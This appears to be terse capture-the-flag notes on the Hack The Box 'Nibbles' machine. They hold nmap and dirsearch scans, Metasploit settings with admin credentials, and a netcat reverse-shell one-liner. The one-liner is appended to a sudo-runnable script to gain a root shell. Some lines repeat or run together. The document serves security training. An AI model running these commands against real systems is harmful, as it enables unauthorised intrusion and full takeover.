HTB | Nibbles
Skill Learned
NMAP
nmap -sT -p- --min-rate 10000 10.10.10.75

Port 80





Foothold/shell





Priv Esc



Last updated
nmap -sT -p- --min-rate 10000 10.10.10.75














Last updated
nmap -sC -sV -p 22,80 10.10.10.75dirsearch -u http://10.10.10.75/nibbleblog/ -x 404,403set USERNAME admin
set PASSWORD nibbles
set RHOST 10.10.10.75
set RPORT 80
set TARGETURI /nibbleblog/echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.3 1234 >/tmp/f" >> monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh